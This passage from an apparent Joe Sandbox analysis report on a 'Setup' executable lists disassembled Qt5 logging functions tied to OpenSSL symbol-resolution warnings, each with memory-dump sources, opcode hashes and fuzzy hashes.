                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_DSA_PUBKEY$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1414460325
                                                                                                                                                              • Opcode ID: 60f43b254c411bfb565f3ab4d48a66edf47e73b04656fb165ac71c11eed6c3c0
                                                                                                                                                              • Instruction ID: 3e90d489aa4b725a82ce514c9f0e720b031bf447cd10d84f5d1e1672e4ba7484
                                                                                                                                                              • Opcode Fuzzy Hash: 60f43b254c411bfb565f3ab4d48a66edf47e73b04656fb165ac71c11eed6c3c0
                                                                                                                                                              • Instruction Fuzzy Hash: EBF0B499F0EA9281EBD39B71E8012A53392BF84B10F409037DD6D4B322FE2CE0458F00
                                                                                                                                                              Function 00007FFBA1A36C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C58
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C7D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3D1AD), ref: 00007FFBA1A36C94
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$d2i_X509
                                                                                                                                                              • API String ID: 646154281-3355304157
                                                                                                                                                              • Opcode ID: b57f755d6fb5ea0b7d62026d068e5699f4ebe56bc6dde96c3cc9abd606cd4eca
                                                                                                                                                              • Instruction ID: b12243bb1200d5620820cc6aec1c7daa43263d080d15e41c969ab0275bfd9e44
                                                                                                                                                              • Opcode Fuzzy Hash: b57f755d6fb5ea0b7d62026d068e5699f4ebe56bc6dde96c3cc9abd606cd4eca
                                                                                                                                                              • Instruction Fuzzy Hash: 96F09095E0EA8281EBD39B71E8116B53392AF88B10B409137DD6D4A721FE2CA1458E00
                                                                                                                                                              Function 00007FFBA1A36460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_dup
                                                                                                                                                              • API String ID: 646154281-2674687481
                                                                                                                                                              • Opcode ID: 92396b57c9a5ed5494a28b8dde66c2624e16c6e6e48755d94d6f5c1a29c19c01
                                                                                                                                                              • Instruction ID: 4fcc7ba31c63f9a3d37c6c7de8a38927d2a4fea5a7dbc946a1300fadd3fe8779
                                                                                                                                                              • Opcode Fuzzy Hash: 92396b57c9a5ed5494a28b8dde66c2624e16c6e6e48755d94d6f5c1a29c19c01
                                                                                                                                                              • Instruction Fuzzy Hash: 3BF09095F0FA9281EBC3AB71E8116A53792AF84B10B408037DD6D4B321FE2C95498F00
                                                                                                                                                              Function 00007FFBA1A333D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A333E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A3340D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F0F), ref: 00007FFBA1A33424
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_DSAPrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-228587887
                                                                                                                                                              • Opcode ID: 51ae922b63f6e53e6c96b64fd716fb350d4e1baa21b4ae49e9e452016fb2d449
                                                                                                                                                              • Instruction ID: 3c0c32feec872cc0266817d04834718d8574c3d1a055b759b60e5abcf2394373
                                                                                                                                                              • Opcode Fuzzy Hash: 51ae922b63f6e53e6c96b64fd716fb350d4e1baa21b4ae49e9e452016fb2d449
                                                                                                                                                              • Instruction Fuzzy Hash: A4F09099F0E65281EF939B71E8122A52391BF84710F809033DD6D8B221EE2CD415CE00
                                                                                                                                                              Function 00007FFBA1A32BF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A32C08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A32C2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A32C44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_init_ssl$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-4022273804
                                                                                                                                                              • Opcode ID: 79fffda076bb35a56d46c04dc43edced1435804281e7fb83af85fb60d4cd7ab7
                                                                                                                                                              • Instruction ID: 75b879ad58b3797c4fbd79a313bfd294305e5e20785c3753cfe5b16ed907a446
                                                                                                                                                              • Opcode Fuzzy Hash: 79fffda076bb35a56d46c04dc43edced1435804281e7fb83af85fb60d4cd7ab7
                                                                                                                                                              • Instruction Fuzzy Hash: C5F0B4A5F0EA8281EFC3AB71E8162B53392BF84B10B409037DD6E4B321FE2CD4058E00
                                                                                                                                                              Function 00007FFBA1A32B80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A32B98
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A32BBD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A32BD4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_init_crypto$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3686544713
                                                                                                                                                              • Opcode ID: f09f0557ba38b57d6af1488cedf3354918c99857f4d49e1ed0757553d1006ec2
                                                                                                                                                              • Instruction ID: 7c3a60f56d99c427384f0bad5c7cad9173a083cff0ea42adc223396a8e8f728c
                                                                                                                                                              • Opcode Fuzzy Hash: f09f0557ba38b57d6af1488cedf3354918c99857f4d49e1ed0757553d1006ec2
                                                                                                                                                              • Instruction Fuzzy Hash: EFF090A5E1EA8281EBC39B75E8116A53392AF84B10B408037DD6E4B321FE2CD4558E00
                                                                                                                                                              Function 00007FFBA1A36380 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A36398
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A363BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1,?,?,?,?,00007FFBA19714F9), ref: 00007FFBA1A363D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_cmp
                                                                                                                                                              • API String ID: 646154281-406385445
                                                                                                                                                              • Opcode ID: 9a08dbc820ea3dd009b2b86eaf96b62e11e5c4bddc3669a91f500dda312daa15
                                                                                                                                                              • Instruction ID: ea6eb831dc71838c3f239666d6c3d7697286ec0d428b8af13f86f2ca32139e73
                                                                                                                                                              • Opcode Fuzzy Hash: 9a08dbc820ea3dd009b2b86eaf96b62e11e5c4bddc3669a91f500dda312daa15
                                                                                                                                                              • Instruction Fuzzy Hash: C4F090A5F0EB9281EBC3AB35E8116A57352AF84B10B448237DD6D4B361FE2CD5458E00
                                                                                                                                                              Function 00007FFBA1A31300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A31318
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A3133D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A31354
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: CRYPTO_get_ex_new_index$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-4194944823
                                                                                                                                                              • Opcode ID: 97c54c368cf6be8dc80d72e34a443faa34f26f7f55d3c92d3ca3c39c6381c467
                                                                                                                                                              • Instruction ID: 21ef6552a9fca108b5863f97cc97a08c5db877bb60d6103f92117d8db9a1d3cd
                                                                                                                                                              • Opcode Fuzzy Hash: 97c54c368cf6be8dc80d72e34a443faa34f26f7f55d3c92d3ca3c39c6381c467
                                                                                                                                                              • Instruction Fuzzy Hash: B2F0B4A5F0EA9281EBC3AB35E8116A53352BF84B20F409233DD7D4B6A1EE3CD4158F00
                                                                                                                                                              Function 00007FFBA1A30650 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A30668
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A3068D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EDCB), ref: 00007FFBA1A306A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: ASN1_STRING_length$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1931847270
                                                                                                                                                              • Opcode ID: f573c45747f98835305159cbca9149847da22b254d561d6516cdbcd83ee975c4
                                                                                                                                                              • Instruction ID: 13313baceeb6338c46d2b91749894ceb434012028efbf287da052c8af72a0f9f
                                                                                                                                                              • Opcode Fuzzy Hash: f573c45747f98835305159cbca9149847da22b254d561d6516cdbcd83ee975c4
                                                                                                                                                              • Instruction Fuzzy Hash: A3F09AA5F0EA9281EBC3AB75EC112A53392BF84B10B809037DD6D4B325FF2CE0058E00
                                                                                                                                                              Function 00007FFBA1A30E30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E48
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E6D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E49), ref: 00007FFBA1A30E84
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_new$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1326833877
                                                                                                                                                              • Opcode ID: 267e2bccb42b3167af321203bc91657d61c371a1296f914e1a4fbdda0f8872e9
                                                                                                                                                              • Instruction ID: eebbcf56b07bd4bfe47b255119c1d8390f0c4103200c2fe40b73f8e34fe6d8ee
                                                                                                                                                              • Opcode Fuzzy Hash: 267e2bccb42b3167af321203bc91657d61c371a1296f914e1a4fbdda0f8872e9
                                                                                                                                                              • Instruction Fuzzy Hash: 75F09099F0EA8281EBD39B75E8112A53292BF84B10B409037DD6D4B321FE2C94058E00
                                                                                                                                                              Function 00007FFBA1A36620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A36638
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A3665D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3ED6B), ref: 00007FFBA1A36674
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
